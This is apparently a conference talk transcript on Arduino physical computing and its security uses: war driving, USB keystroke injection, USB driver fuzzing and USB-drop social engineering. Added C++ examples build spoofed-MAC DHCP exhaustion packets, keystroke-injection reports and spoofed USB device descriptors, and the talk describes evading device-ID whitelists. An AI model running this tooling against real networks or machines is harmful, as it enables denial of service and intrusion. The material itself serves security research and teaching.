I'm Philip, also known as Follower, and this is Lee. Physical computing. Who here is familiar with the term? I take that as a no. Physical computing is the idea of taking computing power and taking it away from the box. So instead of having a box with a monitor and a keyboard on the screen, you have some other device that looks different and, like this, may look slightly more friendly. This is an example of a project called MoMo. MoMo has the ability to tell you where to go. It has a home programmed into it and it finds its way, and the way that it directs you is that it tilts its head to point you in the direction that you need to go. This is an example of a physical computing project that is able to create an emotional connection with the people that use it. For example, when was the last time that you saw someone snuggling up to their Garmin GPS device and going, "Oh, a little LCD, how cute you are"? But this is the kind of response that physical computing devices can provoke in people.

Does anybody here read hackaday.com? OK, you've probably never heard of the Arduino before then, so I'll give you a little bit of an introduction. This is the Arduino. The Arduino is an example of a project which is designed to help people create physical computing devices. It was originally designed for artists and designers and non-technical users to get into using hardware and electronics. It was developed in Italy by a group of people at a design school and, contrary to popular belief, it's not actually named after an Italian emperor, it's named after a pub down the road from where they worked.

So, we'll have a look at some other examples of physical computing projects. This is a project called Botanicalls. Anybody here have pot plants? Are they dead or alive? So one of the problems that these people were looking at was people have pot plants, but apparently they don't know when to water them.
So with a Botanicall, you can plug it into the dirt in your pot plant and it will tweet you or send you an SMS message when it needs to be watered. And then when you water it, it will tweet you and say, "Hey, thanks a lot." Well, you're referring to plants in pots, right? Yeah. Okay, just making sure on that one. Yeah, it probably won't work quite so well in your garden. Although, to be honest, maybe you should try that and find out. Maybe there's a whole new market for it.

This is a turn signal jacket. Basically, when you're riding along at night, you want to be able to show people which way you're turning. It has little switches at the end of the sleeves and you basically indicate which way you're going and it will send your lights one way or the other, and hopefully people will avoid driving into you. So these are examples of projects where hopefully you'll get the idea that it's no longer about being in a grey box or a black box. It's about taking some input from the world, doing a little bit of processing on it and then taking some result, whether it's lighting a light or sending a text message or moving a servo.

So the tools that people are using include the Arduino board I showed at the beginning, but it's also available in a lot of different shapes and sizes. This is the Nano, which is a smaller version; the Mega, which is a bigger version; and the LilyPad, which you saw in the turn signal jacket. So the LilyPad is a little bit different, but it's designed to be incorporated into clothing and fabric, and it's actually connected using conductive thread, which apparently originates from fencing. That's the sport, not what people do in New Zealand to keep the sheep in. The project for the Arduino, all the board files, are available under an open source licence, so people have produced clones like this one, which is called the Freeduino. And you can also have bare bones variations as well. So the main chip on the board is a chip from a company called Atmel.
You can buy it off the shelf. It's probably kind of $2 to $4 depending on which version you get. And because of that you can start from buying an official board, and that's probably kind of $20 to $30, and then when you create a project you can then make a standalone version. So that means that you can have just the microcontroller itself. The Arduino is a really good case study of a successful open source hardware project as well as open source software. Despite there being dozens and dozens of different clones of the Arduino, they sell 50,000 a year of the original one, something along those lines. Yeah, they've sold somewhere north of 150,000 units over the last five years.

So the Arduino doesn't just consist of the board. It consists of a complete environment. So you've got the board, you've got the development environment, which is based on a project called Processing. It uses Java for the actual software, but what you write in is a subset of C and C++. Don't let the Java scare you. Yeah, you'll never have to touch it. And underneath it is GCC, which I think is really cool because it means that the project's open source sort of all the way down. But also, once you learn a little bit at the beginning, you can kind of work your way down through the software stack, and if you run into limitations going through the easier development environment you can drop down to GCC and assembly if you really wanted to.

An example of the code and the language that you use: this is the first sketch, which is what they call a program in the Arduino world. Basically there's two required functions, a setup function that gets run once and a loop function that keeps on running until the power turns off or the end of the world occurs, whichever comes first. So watch out around 2012. You don't want to waste extra battery power if you don't need it. You'll see that it's very similar to C. It's got kind of little bits of JavaScript if you're used to kind of using that.
It's a very similar sort of language. You do have to worry eventually about things like types and memory management, but certainly starting off, there's heaps of examples that you can use. The other thing that makes the Arduino environment powerful is that there's a lot of third-party library support for it. So that means that a lot of your projects can really take a library from somewhere that deals with one aspect of it and a library from another area, and they just pull them together with a little bit of glue code.

So you're not limited to just the board itself. There's a whole range of expansion shields that are available. Ethernet gives you a wired Ethernet connection. It has a hard-wired TCP/IP stack on a chip, and there's basically a sockets-level interface that's been written to it, and then there's another library over the top of that which makes it easier to access, so you basically can make a call out to make a client connection or act as a server as well. It's quite a powerful solution. You can have up to four hardware connections at a time, or three hardware connections and as many software connections as you care to implement, and it goes down to MAC-level access, and obviously other protocols you can implement on top. GPS, which will tell you where you are, unless you're inside a building, in which case it won't. And there's a lot of solutions available. This particular board you can plug different GPS modules into depending on what your requirements are. You can also have cellular connections, sending SMS messages, making data connections and so forth. And also microSD, which gives you the ability to have large amounts of storage. So on the Arduino chip, or the chip used on the Arduino, you've got 32 kilobytes of program storage space and 2K of RAM, so no Windows 7 installed, but you can reduce your target a little bit. You can do a lot in that space.
One of the projects I'm showing a little bit later is using maybe two-thirds of the available memory, and it's a reasonably sophisticated project. So don't let those numbers put you off. It's more like back in the 80s, when you could do a lot. Also Wi-Fi modules. This one's called the Wi-Fi board, and it can connect over secured and insecure networks, supports up to WPA2 and so forth.

So one question you might have is, okay, if I'm going to get started with this, why should I get started with microcontrollers rather than using, say, an embedded Linux board or a plug computer or something like that? Basically you're going to have a trade-off between three factors. One of them is the cost. You've got the option to buy an official board, which, as I say, is about $20 to $30, or you can buy one of the knock-offs, which is kind of somewhat less than that. You might get a more powerful system if you buy, say, a plug computer or something like that, but then you're going to probably be looking at about $100 to start off with, and then if you're wanting multiples of them, there's no way to kind of easily get it cheaper. So the main restriction in terms of processing power is that you're not going to be doing video and audio processing. It's going to be more limited. So depending on what your project is that you're wanting to do, that will determine whether or not you want to go for an embedded Linux board or stick with something that's microcontroller-based.

So anybody here interested in security? So with any new development, there's new opportunities for doing research into both positive and negative side effects of a new technology or a new use of a technology. Physical computing is no different. It's also part of a concept called the Internet of Things, which is basically the idea that you have millions and billions of smart sensors that are connected to the Internet that detect particular states and then report back.
But again, because a lot of this stuff is hardwired, that means that if somebody's made a mistake, then it's there kind of forever. So a lot of the issues that you'll run into are the same sort of things that have been run into in traditional computer systems, traditional websites, but they're in a hardwired solution. So they're a lot harder to just upgrade. So for example, the Ethernet board I indicated earlier has a hardware TCP/IP stack. So the question is, are there any vulnerabilities in that? To which I say, you should try and find that out. Basically, I would be surprised if it was a perfect TCP/IP stack, because I don't think that's been invented yet. This is a TCP/IP stack that, when sending HTTP requests, uses a packet per character. Well, to be fair, that's the driver. But yeah, so you've got both the hardware level and the driver level stuff as well. And so, yeah, certainly there's room there to find ways that it could be improved and potentially risks associated with it.

So one of the other approaches that you can take is maybe re-implement some old friends in new ways. So one of the projects that I looked at was DHCP exhaustion, which seemed like a reasonably simple project to start with. The WIZnet board, which is the wired Ethernet board, allows you to change your MAC address on the fly. And this is the sum total of code, basically, to implement DHCP exhaustion, which is, you know, not really much to it. Shock and awe, yeah.

Other people have taken other approaches. This is from a payment machine in Canada somewhere. You'll notice just above the S of the word "skimming" a little board; that's a Bluetooth board. So basically these people set up a Bluetooth link between the handset for a payment unit and wherever they were, and were skimming cards off the top. And it used to be that if you wanted to get a custom Bluetooth solution, you'd have to have a whole lot more intelligence than just plugging in some wires.
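The DHCP exhaustion sketch itself is on the slide, not on this page. What follows is an added example, not the speakers' code: it builds the DHCPDISCOVER that such a loop sends once per spoofed MAC, written as host-side C++ so the packet can be inspected offline. On the board the same buffer would go out of a UDP socket bound to port 68 to 255.255.255.255:67 after the WIZnet chip has been given the new MAC; the `next_mac` scheme (locally administered unicast addresses) and the transaction IDs are this example's own choices.

```cpp
// Added example (not the talk's own sketch): the DHCPDISCOVER that a
// DHCP-exhaustion loop sends once per spoofed MAC. On the Arduino with the
// WIZnet shield the buffer would go to a UDP socket bound to port 68 and be
// sent to 255.255.255.255:67 after re-applying the MAC; this host-side C++
// version builds and checks the packet offline.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>

static const size_t DHCP_FIXED_LEN = 236;                 // BOOTP header before the options field
static const size_t DHCP_MAX_LEN = 300;                   // enough for our handful of options
static const uint8_t DHCP_MAGIC[4] = {99, 130, 83, 99};   // RFC 2132 magic cookie

// The n-th spoofed MAC (example scheme): first octet 0x02 marks it locally
// administered and unicast, so it looks like a plausible host to the switch.
void next_mac(uint32_t n, uint8_t mac[6]) {
    mac[0] = 0x02;
    mac[1] = 0x00;
    mac[2] = (uint8_t)(n >> 24);
    mac[3] = (uint8_t)(n >> 16);
    mac[4] = (uint8_t)(n >> 8);
    mac[5] = (uint8_t)n;
}

// Write a minimal DHCPDISCOVER to out (at least DHCP_MAX_LEN bytes) and
// return its length. chaddr and the client-identifier option both carry the
// spoofed MAC, so the server reserves an offered lease for that address.
size_t build_dhcp_discover(const uint8_t mac[6], uint32_t xid, uint8_t *out) {
    memset(out, 0, DHCP_MAX_LEN);
    out[0] = 1;                      // op: BOOTREQUEST
    out[1] = 1;                      // htype: Ethernet (10Mb)
    out[2] = 6;                      // hlen
    out[3] = 0;                      // hops
    out[4] = (uint8_t)(xid >> 24);   // xid, big-endian
    out[5] = (uint8_t)(xid >> 16);
    out[6] = (uint8_t)(xid >> 8);
    out[7] = (uint8_t)xid;
    out[10] = 0x80;                  // flags: broadcast, we have no IP to unicast to yet
    memcpy(out + 28, mac, 6);        // chaddr
    memcpy(out + DHCP_FIXED_LEN, DHCP_MAGIC, 4);
    size_t p = DHCP_FIXED_LEN + 4;
    out[p++] = 53; out[p++] = 1; out[p++] = 1;     // option 53: DHCP message type = DISCOVER
    out[p++] = 61; out[p++] = 7; out[p++] = 1;     // option 61: client identifier = htype + MAC
    memcpy(out + p, mac, 6); p += 6;
    out[p++] = 255;                                // end option
    return p;
}

// Recover the fields a server keys the lease on: chaddr and message type.
// Returns false for anything that is not a well-formed DHCP packet.
bool parse_dhcp(const uint8_t *pkt, size_t len, uint8_t mac_out[6], uint8_t *msg_type) {
    if (len < DHCP_FIXED_LEN + 4 || pkt[0] != 1 || pkt[1] != 1 || pkt[2] != 6) return false;
    if (memcmp(pkt + DHCP_FIXED_LEN, DHCP_MAGIC, 4) != 0) return false;
    memcpy(mac_out, pkt + 28, 6);
    size_t p = DHCP_FIXED_LEN + 4;
    while (p < len && pkt[p] != 255) {
        if (pkt[p] == 0) { p++; continue; }        // pad option has no length byte
        if (p + 2 > len) return false;
        uint8_t code = pkt[p], olen = pkt[p + 1];
        if (p + 2 + olen > len) return false;      // option runs past the packet
        if (code == 53 && olen == 1) { *msg_type = pkt[p + 2]; return true; }
        p += 2 + olen;
    }
    return false;
}

int main() {
    uint8_t mac[6], pkt[DHCP_MAX_LEN];
    // The exhaustion loop: one DISCOVER per address. On the board this is
    // where the MAC is re-applied to the WIZnet chip and the UDP send happens.
    for (uint32_t n = 0; n < 3; n++) {
        next_mac(n, mac);
        size_t len = build_dhcp_discover(mac, 0x1000u + n, pkt);
        printf("DISCOVER %zu bytes from %02x:%02x:%02x:%02x:%02x:%02x\n",
               len, mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
    }
    return 0;
}
```

The parser is there so the packet can be checked from the server's point of view: it is the chaddr, not the Ethernet source address, that most servers key the lease pool on, which is why rotating the MAC on the chip and in the packet together is what empties the pool.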
But now you too can take these approaches if you'd like. So another popular activity during the 90s, which some of you may remember, was the whole concept of war driving. You'd probably have a laptop and maybe an aerial and the right Wi-Fi card, and eventually you'd get something running. So, oh cool. Now this stack will implement the same sort of thing for you. So this has got a Wi-Fi board, which does the wireless connections; microSD, which does logging; GPS, which detects where you are; and an Arduino board. So, let's have a look at this, while Lee hopefully gets that working. So basically the motivation with this was to be able to apply power, and you probably can't see all the way from the back, but this is the actual-size unit. Apply power to it. It sits there, waits until it gets a GPS lock and then starts doing a scan for the available networks and then records anything that it finds.

Now one of the interesting things that you have working in a cut-down environment like this is that some things that you take for granted aren't actually implemented. So one of the issues I ran into was, well, how do I keep track of which access points I've already recorded and which ones I haven't? I considered briefly installing PostgreSQL or something on it, but that apparently hasn't been ported yet. So what has been ported is an SdFat library, which implements the FAT file system on the SD card. And so by creating a directory path which matched the MAC address of any access point as I accessed it, I could then just check to see if that file existed, and now you've got a simple on-disk database of all the access points. So that records it to a file and then carries on. And then potentially this could also serve up the data. But as far as I've modified it so far, it basically records to the SD card and then you can pull it off onto your own machine. Are we in luck? Yeah? Yeah. Plus they're a bit harder to fit in your backpack.
But yeah, I mean, that's totally... it's kind of going back to, yeah, like the 70s and 80s, where you could actually achieve a lot without a whole lot of support in terms of RAM and so forth. Oh, cool. Okay, so this is basically the result of opening up the logged file and using another project called OpenLayers, which does mapping and provides a JavaScript interface and uses OpenStreetMap for the mapping data. And so basically it's recorded whether or not it's an open network, a WPA network or a WEP network, with different coloured stars to make it look pretty. And yeah, so that's all produced automatically from the log file once you've got it. Now the interesting thing is that that particular page is being served off a server, but in theory, aside from the actual map data, the whole page itself could be served off the module as well, which then gives you the ability to access it remotely, or potentially to have the unit upload the data autonomously, so it can just sit in your backpack or sit in a target area. And this was in case the demo didn't work, but of course it did. So when it finds it again... A, B, anybody? It's finding it.

So the next topic, when we get up to it, is software USB. So there's been a few talks already this week, both at BSides and I think there's some more coming up today, about USB fuzzing and fun stuff that you can do if you can create your own custom USB device. So a lot of those solutions use a hardware USB implementation. There was a guy in Austria that wrote a software USB implementation called V-USB, which was previously known as AVR-USB, and basically this guy, apparently in one of Austria's long winter nights, sat down and decided that he'd work out how to implement low-speed USB in software. So basically that was assembly-level hacking, working out individual clock cycles, and he managed to get this chip, which only runs at 16 MHz, to actually support low-speed USB. So you can implement low-speed USB devices.
So that's things like keyboards, mice and those sorts of things. Then I came along and thought that was pretty cool, but there wasn't a lot documented and there wasn't an easy way to access it from the Arduino environment, so I created an Arduino library that wrapped V-USB. So some of the projects that have done keyboard emulation in the past are things like Capslocker from a couple of years ago, where you plugged a USB device in and it would toggle the Caps Lock key on your victim's computer at random so they think that their keyboard is broken. I implemented an example that performed the same technique. Slightly more useful is a project called YubiKey, which actually does authentication, and it will send in an authentication key when you press a button or something like that, which means you don't have to type in something from a two-factor authentication device.

So as an example of how you can use the USB side of things, this is two parts. The first part is a piece of Python code, and it uses libusb in the background to create what's essentially a serial connection to a device, and then the USB code on the Arduino is this section, and basically it reads whatever's being sent over it. Now I can give you a demo of something here. So this here has an Atmel chip in it which is running in the same way as an Arduino. It's got a switch on the back and a pretty light on the front, which isn't doing anything at the moment. When you press the button down it changes into a green light mode, which means that when you press the button again it'll type out my domain name, which is really impressive when you have a decent internet connection and it actually goes there.
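How "type out my domain name" works at the wire level is not shown on the page, so here is an added example (not the speaker's V-USB wrapper): the 8-byte boot-keyboard reports a keyboard device sends, generated from a string. It assumes a US layout on the host (the host, not the device, maps keycodes to characters), sends a release report after every key so repeated letters are not merged into one press, and refuses to type anything if a character has no key rather than silently dropping it. The string typed in `main` is constructed; the speaker's real domain is not on the page.

```cpp
// Added example (not the talk's library code): turning text into the 8-byte
// boot-keyboard reports a V-USB keyboard device sends. Byte 0 is the modifier
// bitmap, byte 1 reserved, bytes 2-7 up to six pressed keycodes. Assumes a US
// keyboard layout on the host; another layout would garble the punctuation.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>

static const uint8_t MOD_LSHIFT = 0x02;
static const size_t REPORT_LEN = 8;

// Map one ASCII character to (modifier, keycode). Returns false for
// characters with no key on the US layout.
bool hid_for(char c, uint8_t *mod, uint8_t *key) {
    *mod = 0;
    if (c >= 'a' && c <= 'z') { *key = (uint8_t)(0x04 + (c - 'a')); return true; }
    if (c >= 'A' && c <= 'Z') { *key = (uint8_t)(0x04 + (c - 'A')); *mod = MOD_LSHIFT; return true; }
    if (c >= '1' && c <= '9') { *key = (uint8_t)(0x1e + (c - '1')); return true; }
    switch (c) {
        case '0':  *key = 0x27; return true;
        case '\n': *key = 0x28; return true;   // Enter
        case ' ':  *key = 0x2c; return true;
        case '-':  *key = 0x2d; return true;
        case '=':  *key = 0x2e; return true;
        case '.':  *key = 0x37; return true;
        case '/':  *key = 0x38; return true;
        case ';':  *key = 0x33; return true;
        case ':':  *key = 0x33; *mod = MOD_LSHIFT; return true;
        case '_':  *key = 0x2d; *mod = MOD_LSHIFT; return true;
        case '!':  *key = 0x1e; *mod = MOD_LSHIFT; return true;
        case '?':  *key = 0x38; *mod = MOD_LSHIFT; return true;
        default:   return false;
    }
}

// Expand text into a sequence of reports: a key-down report followed by an
// all-zero key-up report for every character, so "ll" is not coalesced into
// one press. Returns the number of reports, or 0 if a character is unmappable
// or the buffer is too small (nothing is typed in that case).
size_t type_string(const char *text, uint8_t *out, size_t cap) {
    size_t n = 0;
    for (const char *s = text; *s; s++) {
        uint8_t mod, key;
        if (!hid_for(*s, &mod, &key)) return 0;
        if ((n + 2) * REPORT_LEN > cap) return 0;
        uint8_t *down = out + n * REPORT_LEN;
        memset(down, 0, 2 * REPORT_LEN);   // zeroes the key-up report too
        down[0] = mod;
        down[2] = key;
        n += 2;
    }
    return n;
}

int main() {
    // Constructed string; on the device each report goes out as one interrupt
    // transfer, with the sketch waiting for the host to poll between them.
    const char *text = "http://example.com/\n";
    uint8_t reports[REPORT_LEN * 64];
    size_t n = type_string(text, reports, sizeof reports);
    for (size_t i = 0; i < n; i++) {
        const uint8_t *r = reports + i * REPORT_LEN;
        printf("report %2zu: mod=%02x key=%02x\n", i, r[0], r[2]);
    }
    return 0;
}
```

The all-or-nothing check in `type_string` matters for the attack use mentioned later in the talk: a payload with one untypeable character silently dropped is worse than no payload at all.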
The idea is that you can send any keystrokes that you like, so that includes things like, on a Mac, making Exposé or Dashboard appear and disappear. Some of the other projects that have been mentioned, and I think are coming up again later today, do things like they'll actually send the content of an exploit or something like that. One advantage with this approach is that basically you need the chip and the components and the actual connector yourself, so it's really cheap and really easy to get started with as well. There are downsides to it: it doesn't work in every device. In fact I've got one laptop where it'll work if you plug it into one USB port on one side but it won't work if you plug it in on the other side. But it's still fun to be able to create a USB device and do stuff with it.

One of the other projects is software protection dongles. I won't demonstrate it now, but basically you can have a chunk of Python which is encrypted in some way, send it out to the device, which will then decrypt it and then send it back, which is really just an example of how you can have an external device perform some function that won't work if it's not connected. And of course we know how well software protection dongles work in practice.

So one of the other aspects is USB fuzzing. So this is the idea of finding faults in drivers and hopefully exploiting them. For those who don't know how USB works, essentially when you plug in a USB device the host says, "Hi, who are you?" and the device says, "Oh hey, I'm this device here," and gives a vendor ID and a product ID, and normally the host would load the correct driver and things would carry on happily.
So what you do with USB fuzzing, or at least at the first stage of it, is you say, "Oh hi, I'm this device. Oh hi, I'm this device. Oh hi, I'm this device," and then eventually, if you're lucky, your operating system will go, "Oh hey, I've got a driver for that here, let's load it," and then, because you're not actually that device, if the driver is making some assumption about the way that you work, it'll dislike it. So the question is, does it actually work? Well, the answer is yes. So this is a log taken from, I think it was an Ubuntu 9.04 or something like that, machine, and basically by plugging in the device and pretending to be a particular iPad device, the iPad driver would load and then, I think it was a null pointer dereference that it encountered. Now the interesting thing about this was that when the crash happened, basically no more USB devices would be recognised and you had to reboot the machine to actually get USB back. And the funny thing was that it could actually still do this even if you were just sitting on the login screen, which means there's a whole lot of stuff about, well, why are you making every single USB driver active at the login screen, because you know you're not going to use half of them there. But it also means that it creates a greater attack surface, because it means that you don't actually have to only have a device that might handle some sort of input; it can be any device, because the drivers are potentially going to be loaded already. So there's other people who have done some work on that as well. This is a really sophisticated program that will cause the crash. It sets the vendor ID and the product ID and then it sits there and waits for you to plug it in. So Lee is going to talk a little bit more about the USB fuzzing side of things and what other people have done. So just from this slide here, you got that iPad crash from running through the entire Linux USB device ID database.
So basically there's a list of known USB devices, and so the code that didn't just exploit it but actually searched for it went through the whole list and tried it out. There's potentially other devices that aren't done on other operating systems. So you could actually just go through the complete key space on that. Sorry about all the AV fail, folks.

A few other ideas, inspiration about potential ways that this kind of hardware attack can be used. How about a pocket RFID data collector? In the same way as we've implemented war driving here, potentially you could walk around collecting RFID application tokens or something like that. A much smaller self-contained rig is possible than sort of hooking it up to a laptop. Similarly with Bluetooth, with the BlueSMiRF module Follower already mentioned, the PIN catcher that was built. There's a wide variety of other applications for Bluetooth sniffing possible.

So, what are the approaches that you can take as you might go, hey, can I control some sort of mains-powered device? And the concept is really appealing, but unfortunately it can also be lethal. So one approach that you can take if you want to control something that's mains-powered is you can get these power point sockets which are remote controlled with an RF remote. And so I gave a demo where you could actually vote during a presentation as to whether you wanted Christmas tree lights on or a fan light on or a lamp on. And it would just send the signal over the RF remote and turn those particular devices on and off. And that didn't require any interaction with mains power at all. Another potential avenue, there's the Arduino project with Android cell phones. So to be able to control your Arduino-based hardware project from an Android cell phone, there's a toolkit available. And, forward thinking, who here has heard the term road apple? Not in the context of horseshit.
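The "sophisticated program that will cause the crash" and the list walk it came from are on the slides, not here. As an added example, not the speakers' fuzzer, the block below does the enumeration half of that idea: it parses the usb.ids format the Linux database uses (a vendor line, then tab-indented product lines) into vendor/product pairs, and emits the 18-byte device descriptor a V-USB device would answer GET_DESCRIPTOR with for each pair. The usb.ids text in it is a constructed sample of the format, not the real database, and no identifier in it is claimed to crash anything; the device descriptor fields other than VID/PID (bcdUSB, packet size, string indices) are this example's own choices.

```cpp
// Added example (not the talk's fuzzer): the enumeration stage of a VID/PID
// fuzzer. parse_usb_ids() reads usb.ids-format text and
// build_device_descriptor() produces the device descriptor the Arduino would
// present for one (vendor, product) pair. Full key space is 2^32 pairs, which
// at roughly a second per re-enumeration is not a weekend project; the
// database list is the part the host actually has drivers for.
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <sstream>
#include <string>
#include <vector>

struct UsbId {
    uint16_t vid, pid;
    std::string vendor, product;
};

// Parse exactly four hex digits at s.
static bool hex4(const char *s, uint16_t *v) {
    uint16_t acc = 0;
    for (int i = 0; i < 4; i++) {
        char c = s[i];
        int d;
        if (c >= '0' && c <= '9') d = c - '0';
        else if (c >= 'a' && c <= 'f') d = c - 'a' + 10;
        else if (c >= 'A' && c <= 'F') d = c - 'A' + 10;
        else return false;
        acc = (uint16_t)((acc << 4) | d);
    }
    *v = acc;
    return true;
}

// usb.ids: "vvvv  Vendor" at column 0, "\tpppp  Product" beneath it. A
// top-level line that is not a vendor ("C 00  ..." class tables and so on)
// closes the vendor block so its sub-entries are not taken for products.
std::vector<UsbId> parse_usb_ids(const std::string &text) {
    std::vector<UsbId> out;
    std::istringstream in(text);
    std::string line, vendor;
    uint16_t vid = 0, v = 0;
    bool in_vendor = false;
    while (std::getline(in, line)) {
        if (line.empty() || line[0] == '#') continue;
        if (line[0] != '\t') {
            if (line.size() >= 6 && hex4(line.c_str(), &v) && line[4] == ' ') {
                vid = v;
                vendor = line.substr(6);
                in_vendor = true;
            } else {
                in_vendor = false;
            }
        } else if (in_vendor && line.size() >= 7 && line[1] != '\t' &&
                   hex4(line.c_str() + 1, &v) && line[5] == ' ') {
            out.push_back({vid, v, vendor, line.substr(7)});
        }
    }
    return out;
}

// USB device descriptor: 18 bytes, multi-byte fields little-endian. The
// host matches drivers on idVendor/idProduct (offsets 8-11), which is all
// the fuzzer changes between plug-ins.
void build_device_descriptor(uint16_t vid, uint16_t pid, uint8_t out[18]) {
    static const uint8_t fixed[8] = {
        18, 1,       // bLength, bDescriptorType = DEVICE
        0x10, 0x01,  // bcdUSB 1.10
        0, 0, 0,     // class, subclass, protocol: defined at interface level
        8,           // bMaxPacketSize0, the low-speed maximum
    };
    memcpy(out, fixed, 8);
    out[8] = (uint8_t)(vid & 0xff); out[9] = (uint8_t)(vid >> 8);    // idVendor
    out[10] = (uint8_t)(pid & 0xff); out[11] = (uint8_t)(pid >> 8);  // idProduct
    out[12] = 0x00; out[13] = 0x01;      // bcdDevice 1.00
    out[14] = 1; out[15] = 2; out[16] = 0; // iManufacturer, iProduct, iSerialNumber
    out[17] = 1;                           // bNumConfigurations
}

// Constructed sample in usb.ids format (not the real database).
static const char *kSampleUsbIds =
    "# constructed sample\n"
    "1d6b  Linux Foundation\n"
    "\t0001  1.1 root hub\n"
    "\t0002  2.0 root hub\n"
    "0403  Future Technology Devices International, Ltd\n"
    "\t6001  FT232 Serial (UART) IC\n"
    "\n"
    "# List of known device classes, subclasses and protocols\n"
    "C 00  (Defined at Interface level)\n"
    "\t00  Subclass 0\n";

int main() {
    std::vector<UsbId> ids = parse_usb_ids(kSampleUsbIds);
    uint8_t desc[18];
    for (size_t i = 0; i < ids.size(); i++) {
        build_device_descriptor(ids[i].vid, ids[i].pid, desc);
        printf("%04x:%04x %s / %s -> descriptor VID bytes %02x %02x PID bytes %02x %02x\n",
               ids[i].vid, ids[i].pid, ids[i].vendor.c_str(), ids[i].product.c_str(),
               desc[8], desc[9], desc[10], desc[11]);
    }
    return 0;
}
```

On the device side the loop body is: present the next descriptor, wait for the host to finish enumerating (or give up), log whether the host loaded a driver, detach and repeat. The parse step is the part that quietly goes wrong in practice: the real usb.ids file carries class, language and HID usage tables after the device list, whose two-digit sub-entries are tab-indented just like products.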
So a road apple is a social engineering attack where you drop USB keys or another piece of hardware at the company that you're targeting. And as people tend to do, people are going to plug that thing into their computers when they get into the office. So yeah, exactly. What's on this? It can be as simple as including brightshinythings.exe on that road apple. Where you run into issues is a lot of corporations will have USB device IDs and only allow those whitelisted device IDs. Fortunately, you can guess what those whitelisted device IDs are going to be just based on what you know people to be deploying in their corporate networks. And with the functionality of the Arduino USB stack to be able to spoof device IDs, you can potentially pretend to be one of those and present yourself as a mass storage device. Another one that I've been thinking a lot about lately is haptic inputs and outputs. Building covert input devices: if you're potentially going into an area where you're not allowed to take notes or record video or whatever, you could potentially use soft switches, soft circuits, to build a haptic interface that, when you nod your head, records something, or when you tap a spot on your sleeve records text based on Morse code, something like that.

And thinking about that physical way of bypassing things brings me to a brief interlude. Some of you may have seen the T-shirts folks are wearing that say Free Byron, and the stickers and the buttons. Check out freebyron.org. Byron is a friend of mine and fellow hackerspace member who is currently being detained in Canada for criticising the security apparatus and security spending around the G20. So if you're interested at all in the right to dissent and the right to criticise crappy security infrastructure, you should check out freebyron.org. Back to USB fuzzing. I'm going to do a little bit of a summary about the current research and then hand it back over to Follower.
So in terms of USB sniffing and protocol reversing, there's the sort of old and busted USBSnoop, which is still workable up to Windows XP but doesn't work on Vista or 7. It is useful but produces kind of crappy output. PyUSB is useful for that as well, and Nick and Furkan gave a talk on Thursday called Go Go Gadget Python, where they did a bunch of protocol analysis on the USBSnoop output using Python, so that's definitely worth checking out. There's also a variety of expensive commercial USB sniffers and protocol analysers out there, but that's not that interesting. We're talking like a couple of thousand dollars kind of expensive. Some other folks that are working on this stuff: Rafael Dominguez Vega gave a talk last year at DEF CON. He built a PIC-based USB fuzzing device. Moritz Jodeit has a really interesting presentation covering a bunch of security aspects of USB at a protocol level and has done a bunch of software-based fuzzing that's pretty interesting.

So back to, last time we switched, I promise. We're in Vegas, I guess you should... oh wow, there you go, that would have been a good bet. So one thing to keep in mind is I was introduced to the Arduino about three years ago, and up until that stage I'd had an interest in electronics but never sort of got into it too much. There always seemed to be a whole lot of stuff that you had to remember, and it was like, electricity is like water, except when it's not, it kind of goes to a pump, and I'm like, what? But the great thing with the Arduino is it takes what used to be a 100% hardware problem and makes it a 90% software problem and then a 10% hardware problem, and that means that if you're familiar with software then you can kind of get a long way with just writing code, and then you can look at things like the little pieces of hardware that you actually need to learn and pick up that knowledge as you go.
Just the other big step up with the Arduino from previous microcontroller and hardware hacking platforms: the sheer amount of yak shaving that is involved in setting up a lot of other microcontroller platforms is a real barrier to entry for a lot of folks. With the Arduino you download a zip file, install the driver, or it's even already installed on Linux, and you're ready to go. It's also a completely free stack, whereas a lot of the other microcontroller environments out there require proprietary and potentially even non-gratis software. Yeah, exactly. Potentially non-free as in libre as well as non-free as in no cost.

So then there's another section of things which you can do just because you can. This is an example of one of those things. So you can serve up pretty much anything you like when you're using a wireless or wired shield, and so I played for a while with using Python to generate a Flash file and then serve that Flash file up from the chip. Now the restriction in that case was this was before there were good implementations of microSD support, and so essentially everything you were serving up had to be served up from your, in those days, 16K of RAM, and so it turned out that Flash was kind of a more efficient way of getting some kind of cool stuff going. So this is a demo of a demo which has a Flash file which is served up, and then the little grey lines, which you hopefully can see, basically have the ability to return the values of analog pins on the Arduino, and so the idea with this is that you don't actually have to install any software to play with it. You can just plug it into your machine, go to the link-local IP address and it will pop this up, and you can automatically start doing stuff with it, and in the background it uses an HTTP REST implementation which basically gives you a URL for each digital pin that you want to turn on and off. That means you can also use things like JavaScript and stuff like that.
So there's a couple of other variations of this that people have done out there which give you kind of the ability to do stuff. So we have one last demo, which is VNC. Now one of the restrictions is that if you've only got 2K of RAM you can't have a particularly large display space. At least that used to be the case. If we bring it together... So here I've got a VNC client, and it turns out that the VNC server implementation is actually relatively straightforward. Although I suppose I should really say, man, VNC implementation is really, really difficult and it took a really long time to get this to work. Yeah, the protocol is quite well documented and is something that you can kind of generate as a shield and Arduino fit together and connect. So one of the things that you can keep in mind with this... and there we have it. So we have our 255 pixel by 255 pixel screen, which our Arduino is serving up, complete with a windowed environment, and it's currently giving you a reading of the analog pins, so those red bars and the numbers represent the current state of the analog pins, and because of what's known as a floating input, it will change as the screen advances. So this is an example of, if you're needing to get feedback from a device that you've installed in a location, you've got options out there for things like VNC or using a web browser to retrieve that information.

And again, there's a lot of cool stuff that's still yet to be done. People are finding out what can be done, and a few years ago it was like, oh, you can't connect a camera to an Arduino, and then this camera came out that you could do stuff with. Then it was like, oh, you can't attach USB devices like keyboards or cameras to an Arduino because it can't act as a USB host, and then a USB host chip was released and somebody created a USB host shield, and they're currently working on getting that to do PTP communication with cameras so you can take photographs and stuff like that.
